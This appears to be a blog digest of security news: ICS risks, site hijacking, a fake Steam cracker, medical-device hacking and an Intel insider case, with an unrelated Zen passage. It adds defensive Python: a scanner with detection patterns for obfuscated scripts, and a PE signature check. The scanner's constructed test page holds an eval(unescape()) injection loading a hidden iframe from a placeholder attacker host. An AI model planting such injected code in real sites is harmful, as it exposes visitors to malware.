DHS Questions Security of ICS

Operators of America's power, water, and manufacturing facilities use industrial control systems (ICS) to run them. The security of these systems, increasingly linked with Microsoft Windows and the Internet, is now under intense scrutiny because of growing awareness that they could be attacked to cause massive disruption.

Industrial facility operators are making efforts to follow security procedures, such as using vulnerability-assessment scanning tools to check for missing Windows patches. That said, ICS environments present special problems, said managers who spoke on the topic at a conference organized by the DHS.

Chief Legal Officers and CIOs Must Work Together

In a survey by Gartner and ALM, chief legal officers (CLOs) said they need to engage enterprise CIOs more. Further, while CLOs regard CIOs as contributors to corporate strategy, they continue to lack a fundamental understanding of how to use technology in the enterprise or how to interact with their IT departments.

"The survey results showed that communication is the key variable in the success or lack of success of the CLO/IT relationship," said French Caldwell, vice president and Gartner fellow. "When CLOs have substantive conversations with CIOs more than once a month, CLO satisfaction with IT is higher."

Rinzai Zen - Fujaku, Fugu


Samsara is the same as nirvana, defilement the same as purity, and delusion the same as enlightenment.  The challenge to understanding is due to one's ignorance -- the ignorance in mistaking phenomena for ultimate reality. Great is Mind. Heaven's height is immeasurable, but Mind goes beyond heaven; the earth's depth is also unfathomable, but Mind reaches below the earth.

Study Zen -- one discovers the key to all forms of Buddhism.
Practice Zen -- one's life is brought to fulfillment in the attainment of enlightenment.

"Where should your mind be kept?  If your mind is not fixed anywhere it will pervade throughout the body... If your mind is fixed on a certain spot, it will be seized by that spot, and no activities can be performed efficiently. Not to fix your mind anywhere is essential. Not fixed anywhere, the mind is everywhere." 

Hacking Governments With Hijacked Sites

Malicious code planted within compromised Web pages has become the latest method for attackers targeting government organizations, according to research from security firm Zscaler, V3.co.uk reported April 21. The firm found many government-affiliated Web sites carrying code that redirects visitors to attack servers.

The most recent site to become infected was that of the French budget minister. It was found to contain obfuscated JavaScript that sends the visitor to a third-party site, which then attempts to exploit browser vulnerabilities and install malware on the victim's system. The attack is the latest in what Zscaler sees as a string of site hijackings aimed at government-controlled domains.
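The injection pattern described above (an inline script that unpacks an escaped payload with eval/unescape, plus a hidden iframe pointing off-site) is easy to flag with a few heuristics. The scanner below is an added example written for this post, not code from Zscaler or from the affected site; the two HTML pages it scans are constructed samples, and the hostnames ministry.example and attacker.invalid are reserved placeholder names, not real sites.

```python
"""Heuristic scan of an HTML page for injected, obfuscated redirect scripts.

Added example (not from the original post). Flags inline scripts that
combine two or more "packer" constructs, external script includes, and
hidden iframes that point to a host other than the page's own.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructs that legitimate site scripts rarely need but injected
# redirectors use constantly. Two or more in one inline script is a hit.
SCRIPT_INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "document.write": re.compile(r"document\.write(?:ln)?\s*\("),
    "location_assign": re.compile(r"\blocation(?:\.href)?\s*=[^=]"),
    # 20+ consecutive %XX or \xXX escapes: a packed payload, not markup
    "long_escaped_string": re.compile(r"(?:%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}){20,}"),
}


class _Collector(HTMLParser):
    """Collects inline script bodies, external script URLs and iframe tags."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.inline_scripts = []
        self.script_srcs = []
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.script_srcs.append(a["src"])
            else:
                self.in_script = True
                self.inline_scripts.append("")
        elif tag == "iframe":
            self.iframes.append(a)

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.inline_scripts[-1] += data


def _is_hidden(attrs):
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)


def _is_external(url, own_host):
    host = urlparse(url).hostname
    return bool(host) and host.lower() != own_host.lower()


def scan_html(html, own_host):
    """Return a list of findings (dicts) for one page; empty list means clean."""
    c = _Collector()
    c.feed(html)
    findings = []
    for i, body in enumerate(c.inline_scripts):
        hits = [name for name, rx in SCRIPT_INDICATORS.items() if rx.search(body)]
        if len(hits) >= 2:
            findings.append({"kind": "obfuscated_inline_script", "index": i, "indicators": hits})
    for src in c.script_srcs:
        if _is_external(src, own_host):
            findings.append({"kind": "external_script", "src": src})
    for attrs in c.iframes:
        src = attrs.get("src") or ""
        if _is_hidden(attrs) and _is_external(src, own_host):
            findings.append({"kind": "hidden_external_iframe", "src": src})
    return findings


# --- Constructed sample pages (not captured from any real site) ---------
CLEAN_PAGE = (
    '<html><head><title>Example ministry site</title>'
    '<script>document.getElementById("menu").style.display = "block";</script>'
    '</head><body><p>Press releases</p></body></html>'
)

# Payload the injected script would unpack: a document.write of a hidden
# iframe. It is percent-encoded so the word "iframe" never appears in clear.
_PAYLOAD = 'document.write("<iframe src=http://attacker.invalid/in.php width=0 height=0></iframe>")'


def _pct(s):
    return "".join("%%%02x" % ord(ch) for ch in s)


INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script>eval(unescape("' + _pct(_PAYLOAD) + '"))</script>'
    '<iframe src="http://attacker.invalid/in.php" width="0" height="0"></iframe></body>',
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_html(page, "ministry.example"))
```

The indicator threshold (two or more per script) keeps a lone `document.write` in an ad tag from firing; in practice you would run this over a crawl of your own domains and diff the results against a known-good baseline, since a single external include may well be legitimate analytics.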

Social Engineers Target Utilities

The United States Computer Emergency Readiness Team (US-CERT) recently warned that cyber criminals are attempting highly targeted social engineering attacks on operators of industrial control systems (ICS), which are common in utility firms. The attacks take the form of phishing phone calls purportedly from a "Microsoft Server Department" warning of infected PCs. The caller tries to get the utility to enable services that would allow unauthorized remote access.

HINT: Microsoft is not going to call you unless you specifically requested a call. (see also US Utilities Under Daily Cyber-attack)

Steam Cracker Steals User Credentials

Users of Valve's Steam game sales and distribution platform are being targeted by malware peddlers; the lure is a "Steam Cracker", offered on YouTube and on many gamer forums, that supposedly gives users access to all games for free.

The scammers offer simple instructions for installing the software: disable antivirus software and the firewall, then replace the original steam.exe file with the downloaded, cracked one. "The file in question is a fake Steam client, which uses aspects of the real thing but just falls short of being 100 percent convincing (file size, file, and of course the fact that this file isn't digitally signed unlike the real Steam executable)," a GFI researcher said.

If the user runs Windows Vista or a later version of Windows, the file runs and shows a fake client that looks legitimate.
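The "not digitally signed" tell above is something you can check mechanically: an Authenticode signature lives in the PE file's Certificate Table (data directory entry 4), so a replacement steam.exe with an empty entry has no signature at all. The parser below is an added example written for this post, not Valve's or GFI's code; it works on constructed in-memory PE headers rather than a real Steam binary. Note that it only answers "is a signature block present": checking that the signature actually verifies and chains to Valve's certificate needs a full verifier such as `signtool verify` or PowerShell's `Get-AuthenticodeSignature`.

```python
"""Locate the Authenticode certificate table in a PE file (added example).

certificate_table(data) returns (file_offset, size) of the WIN_CERTIFICATE
area, or None when the file has no signature block or is not a PE at all.
build_test_image() builds a CONSTRUCTED minimal PE for demonstration.
"""
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # Certificate Table slot in the data directories
DIRS_OFFSET = {0x10B: 96, 0x20B: 112}  # data directory start: PE32 vs PE32+


def certificate_table(data: bytes):
    """Parse DOS header -> PE header -> optional header -> directory entry 4."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    coff = e_lfanew + 4               # IMAGE_FILE_HEADER, 20 bytes
    opt = coff + 20                   # IMAGE_OPTIONAL_HEADER
    if len(data) < opt + 2:
        return None
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in DIRS_OFFSET:
        return None
    entry = opt + DIRS_OFFSET[magic] + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    if entry + 8 > opt + size_opt or entry + 8 > len(data):
        return None                   # optional header too short to hold the entry
    # For the security directory the first field is a FILE offset, not an RVA.
    off, size = struct.unpack_from("<II", data, entry)
    if size == 0:
        return None
    return off, size


def has_signature_block(data: bytes) -> bool:
    return certificate_table(data) is not None


def build_test_image(signed: bool, pe32plus: bool = True) -> bytes:
    """CONSTRUCTED sample: minimal PE header with no sections, optionally
    followed by a dummy WIN_CERTIFICATE. Not a real or loadable executable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew
    magic = 0x20B if pe32plus else 0x10B
    fixed = DIRS_OFFSET[magic]
    opt = bytearray(fixed + 16 * 8)                     # 16 data directories
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<I", opt, 108 if pe32plus else 92, 16)   # NumberOfRvaAndSizes
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C,
                       0, 0, 0, 0, len(opt), 0x22)
    header = bytes(dos) + b"PE\0\0" + coff + bytes(opt)
    if not signed:
        return header
    # WIN_CERTIFICATE: dwLength, wRevision=0x0200, wCertificateType=2 (PKCS#7),
    # then bCertificate. The placeholder bytes are NOT a real signature.
    blob = b"PKCS7 placeholder, not a real signature"
    pad = (-len(blob)) % 8                              # entries are 8-byte aligned
    cert = struct.pack("<IHH", 8 + len(blob) + pad, 0x0200, 0x0002) + blob + b"\0" * pad
    image = bytearray(header)
    entry = 0x40 + 4 + 20 + fixed + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    struct.pack_into("<II", image, entry, len(header), len(cert))
    return bytes(image) + cert


if __name__ == "__main__":
    for label, img in (("unsigned", build_test_image(False)),
                       ("signed", build_test_image(True))):
        print(label, certificate_table(img))
```

On a real file you would `open(path, "rb").read()` and pass the bytes in; an empty entry 4 on a binary that the vendor normally signs is a strong signal the file was swapped, while a populated entry still has to be verified before you trust it.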

Wearable Firewall Stops Pacemaker Hacking

Researchers from Purdue and Princeton universities have developed a solution to what could be a catastrophic problem for millions of people who use insulin pumps, pacemakers, and other personal medical devices that rely on wireless communication to function: MedMon, a signal-jamming personal firewall for medical devices that detects potentially malicious communications going into, or coming from, a wearable or implanted device.

After identifying malicious signals, MedMon employs electronic jamming, similar to technology used in military systems, to prevent any potentially harmful wireless commands from getting through to the device and causing it to falter or accept instructions that could cause its wearer harm.

Human Body Vulnerable to Cyberattack

The next frontier of cybercrime could be the human body, a researcher at the Black Hat Security Conference demonstrated. In his presentation, "Hacking Medical Devices for Fun and Insulin: Breaking the Human SCADA System," Jay Radcliffe showed how an attacker could remotely compromise two medical devices used to treat diabetes and trigger them to malfunction, with potentially disastrous results.

"Wireless communication with insulin pumps is not secure, they're not designed to be updated and there's no way of patching them," he told the audience. "It's not like a phone, where you can download a firmware update."

Former Intel Employee Pleads Guilty

A former Intel employee, Biswamohan Pani, pleaded guilty to five counts relating to the illegal download of confidential documents from Intel's servers. From June 8 through June 11, he downloaded 13 "top secret" Intel design documents from the company's servers in California, the indictment said.

He copied them from his Intel-issued laptop to an external drive so he could access the documents after he returned the laptop to Intel. He is said to have tried to access the servers again around June 13.

Information

Pragmatic Journey is Richard (Rich) Wermske's life of recovery; a spiritual journey inspired by Buddhism, a career in technology and management with Linux, digital security, BPM, and paralegal work; augmented with gaming, literature, philosophy, art and music; and compassionate kinship with all things living -- especially cats; and people with whom I share no common language.